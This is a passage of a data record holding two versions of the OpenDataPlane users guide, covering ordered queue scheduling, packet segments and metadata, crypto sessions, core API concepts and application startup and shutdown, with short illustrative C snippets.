For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, suppose events with relative\norder 5, 6, and 7 are being executed in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n{\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock has been resolved for all prior events,\nand then enters the critical section.
The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Packet Processing\nODP applications are designed to process packets, which are the basic unit of\ndata of interest in the data plane. To assist in processing packets, ODP\nprovides a set of APIs that enable applications to examine and manipulate\npacket data and metadata. Packets are referenced by an abstract *odp_packet_t*\nhandle defined by each implementation.\n\nPacket objects are normally created at ingress when they arrive at a source\n*odp_pktio_t* and are received by an application either directly or (more\ntypically) via a scheduled receive queue. They MAY be implicitly freed when\nthey are transmitted to an output *odp_pktio_t* via an associated transmit\nqueue, or freed directly via the +odp_packet_free()+ API.\n\nOccasionally an application may originate a packet itself, either _de novo_ or\nby deriving it from an existing packet, and APIs are provided to assist in\nthese cases as well. Application-created packets can be recycled back through\na _loopback interface_ to reparse and reclassify them, or the application can\ndo its own parsing as desired.\n\nVarious attributes associated with a packet, such as parse results, are\nstored as metadata and APIs are provided to permit applications to examine\nand\/or modify this information.\n\n=== Packet Structure and Concepts\nA _packet_ consists of a sequence of octets conforming to an architected\nformat, such as Ethernet, that can be received and transmitted via the ODP\n*pktio* abstraction. Packets have a _length_, which is the number of bytes in\nthe packet. Packet data in ODP is referenced via _offsets_ since these reflect\nthe logical contents and structure of a packet independent of how particular\nODP implementations store that data.\n\nThese concepts are shown in the following diagram:\n\n.ODP Packet Structure\nimage::packet.svg[align=\"center\"]\n\nPacket data consists of zero or more _headers_ followed by zero or more bytes\nof _payload_, followed by zero or more _trailers_. Shown here are various APIs\nthat permit applications to examine and navigate various parts of a packet and\nto manipulate its structure.\n\nTo support packet manipulation, predefined _headroom_ and _tailroom_\nareas are logically associated with a packet. Packets can be adjusted by\n_pulling_ and _pushing_ these areas. Typical packet processing might consist\nof stripping headers from a packet via +odp_packet_pull_head()+ calls as part\nof receive processing and then replacing them with new headers via\n+odp_packet_push_head()+ calls as the packet is being prepared for transmit.\n\n=== Packet Segments and Addressing\nODP platforms use various methods and techniques to store and process packets\nefficiently. These vary considerably from platform to platform, so to ensure\nportability across them ODP adopts certain conventions for referencing\npackets.\n\nODP APIs use a handle of type *odp_packet_t* to refer to packet objects.\nAssociated with packets are various bits of system metadata that describe the\npacket. By referring to the metadata, ODP applications accelerate packet\nprocessing by minimizing the need to examine packet data.
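\n\nAs a brief illustration of the headroom manipulations described above, the following sketch strips an Ethernet-sized header on receive and prepends a replacement before transmit. It assumes +pkt+ is a valid +odp_packet_t+ with sufficient headroom and that +new_hdr_data+ is an application-provided buffer; return values should be checked in real code:\n\n.Adjusting packet headroom (sketch)\n[source,c]\n----\n#define HDR_LEN 14 \/* hypothetical L2 header size, for illustration only *\/\n\n\/* Strip the existing header as part of receive processing *\/\nodp_packet_pull_head(pkt, HDR_LEN);\n\n...process the packet\n\n\/* Prepend a new header as the packet is prepared for transmit *\/\nuint8_t *hdr = odp_packet_push_head(pkt, HDR_LEN);\nif (hdr != NULL)\n\tmemcpy(hdr, new_hdr_data, HDR_LEN);\n----\n\n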
This metadata-driven acceleration is possible because the\nmetadata is populated by parsing and classification functions that are coupled\nto ingress processing and run prior to a packet being presented to the\napplication via the ODP scheduler.\n\nWhen an ODP application needs to examine the contents of a packet, it requests\naddressability to it via an API call that makes the packet (or a contiguously\naddressable _segment_ of it) available for coherent access by the application.\nTo ensure portability, ODP applications assume that the underlying\nimplementation stores packets in _segments_ of implementation-defined\nand managed size. These represent the contiguously addressable portions of a\npacket that the application may refer to via normal memory accesses. ODP\nprovides APIs that allow applications to operate on packet segments in an\nefficient and portable manner as needed. By combining these with the metadata\nprovided by packets, ODP applications can operate in a fully\nplatform-independent manner while still achieving optimal performance across\nthe range of platforms that support ODP.\n\nThe use of segments for packet addressing and their relationship to metadata\nis shown in this diagram:\n\n.ODP Packet Segmentation\nimage::segment.svg[align=\"center\"]\n\nThe packet metadata is set during parsing and identifies the starting offsets\nof the various headers in the packet. The packet itself is physically stored\nas a sequence of segments that are managed by the ODP implementation.\nSegment 0 is the first segment of the packet and is where the packet's headroom\nand headers typically reside. Depending on the length of the packet,\nadditional segments may be part of the packet and contain the remaining packet\npayload and tailroom. The application need not concern itself with segments\nexcept that when the application requires addressability to a packet it\nunderstands that addressability is provided on a per-segment basis. So, for\nexample, if the application makes a call like +odp_packet_l4_ptr()+ to obtain\naddressability to the packet's Layer 4 header, the returned length from that\ncall is the number of bytes from the start of the Layer 4 header that are\ncontiguously addressable to the application from the returned pointer address.\nThis is because the following byte may occupy a different segment and be\nstored elsewhere. To obtain access to those bytes, the application simply\nrequests addressability to that offset and it will be able to address the\npacket bytes that occupy the next segment, etc. Note that the returned\nlength for any packet addressability call is always the lesser of the remaining\npacket length or the size of its containing segment. So a mapping for segment 2\nin the above figure, for example, would return a length that extends only to\nthe end of the packet since the remaining bytes are part of the tailroom\nreserved for the packet and are not usable by the application until made\navailable to it by an appropriate API call.\n\n=== Metadata Processing\nAs noted, packet metadata is normally set by the parser as part of\nclassification that occurs during packet receive processing. It is important\nto note that this metadata may be changed by the application to reflect\nchanges in the packet contents and\/or structure as part of its processing of\nthe packet. While changing this metadata may affect some ODP APIs, changing\nmetadata is designed to _document_ application changes to the packet but\ndoes not in itself _cause_ those changes to be made.
For example, if an\napplication changes the Layer 3 offset using the +odp_packet_l3_offset_set()+\nAPI, subsequent calls to +odp_packet_l3_ptr()+ will return an address\nstarting from that changed offset. By contrast, changing an attribute like\n+odp_packet_has_udp_set()+ will not, by itself, turn a non-UDP packet into\na valid UDP packet. Applications are expected to exercise appropriate care\nwhen changing packet metadata to ensure that the resulting metadata changes\nreflect the actual changed packet structure that the application has made.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet, a\nsession must first be created. Packets processed by a session share the same\ncryptographic parameters, such as algorithms, keys, and initialization vectors.\nA session is created with the *odp_crypto_session_create()* call. After session\ncreation a cryptographic operation can be applied to a packet using the\n*odp_crypto_operation()* call. Depending on the session type (synchronous or\nasynchronous), the call returns either when the operation has completed or\nafter the request has been submitted. In the asynchronous case an operation\ncompletion event will be enqueued on the session completion queue. The\ncompletion event conveys the status of the operation and its result; the\napplication is responsible for freeing the completion event.\nThe operation arguments specify, for each packet, the areas to be encrypted\nor decrypted and authenticated. Also, in the asynchronous case a context can\nbe associated with a given operation, and when the operation completion event\nis retrieved the associated context can be retrieved with it. An operation can\nbe executed in place, in which case the output packet is the same as the input\npacket, or the output packet can be a new packet provided by the application\nor allocated by the implementation from the session output pool.\n\ninclude::..\/glossary.adoc[]\n","old_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:imagesdir: ..\/images\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP.
To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently.\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG).\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform.\n* Distribution and maintenance of each implementation is as its owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary reference implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*.\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator.
In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) whose levels are incremented according to the\ndegree of change they represent. Increments to the fix level represent\nclarifications of the specification or other minor changes that do not affect\neither the syntax or semantics of the specification. Such changes in the API\nspecification are expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto the specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions.
The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from its implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two\n\"flavors\": control and worker, which are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a\nrun-to-completion model.
Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many core processing environments;\nhowever, a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what they represent. Threads can create new events,\nconsume events processed by them, or perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n\n=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system maintained\nmetadata that provide information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information.
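\n\nFor example (a sketch using packet metadata accessors; +pkt+ is assumed to be a valid +odp_packet_t+ and +my_state+ an application-defined pointer):\n\n.Metadata getter and setter accessors (sketch)\n[source,c]\n----\n\/* Getter: read-only metadata such as the packet length has no setter;\n * it changes only via packet manipulation APIs *\/\nuint32_t len = odp_packet_len(pkt);\n\n\/* Getter\/setter pair for the user pointer metadata item *\/\nodp_packet_user_ptr_set(pkt, my_state);\nvoid *state = odp_packet_user_ptr(pkt);\n----\n\n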
Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read only and thus\nno setter is provided to manipulate it. When objects have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIe or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track the flow of time in\nan application, and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: local time API and global time API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads\nsince cross-thread time consistency is not guaranteed, but in many cases\nthread-local time is all that is needed.\nLocal time stamps are thus local to the calling thread and must not be shared\nwith other threads. Current local time can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads,\nso global time stamps can be shared between threads. Current global time can\nbe read with +odp_time_global()+.\n\nNeither local nor global time wraps during the application life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, +odp_time_cmp()+, and conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, and +odp_time_global_from_ns()+.\nTo get the resolution of a time source, +odp_time_local_res()+ and\n+odp_time_global_res()+ are used. To wait, +odp_time_wait_ns()+ and\n+odp_time_wait_until()+ are used, during which a thread may busy loop for the\nentire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n\n=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner.
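\n\nBefore looking at those services, the following sketch illustrates the time APIs just described (local time is used here; the same pattern applies to global time):\n\n.Measuring an interval with the time API (sketch)\n[source,c]\n----\nodp_time_t t1 = odp_time_local();\n\n...work being measured\n\nodp_time_t t2 = odp_time_local();\nuint64_t elapsed_ns = odp_time_to_ns(odp_time_diff(t2, t1));\n----\n\n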
ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding), others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a flow:\n\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n\n=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped into classes for processing and\nallows threads to be dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously.
When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is to transmit it. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per platform\ndirectories. 
Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the #define is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502 \u251c\u2500\u2500 odp\/\n\u2502 \u2502 \u2514\u2500\u2500 api\/\n\u2502 \u2502 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502 \u2502\n\u2502 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown.\nThe terminate functions should only be called when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform specific data that is not yet, or may never be,\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()'. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::resource_management.svg[align=\"center\"]\n\n== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished value _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation and\nlookup.
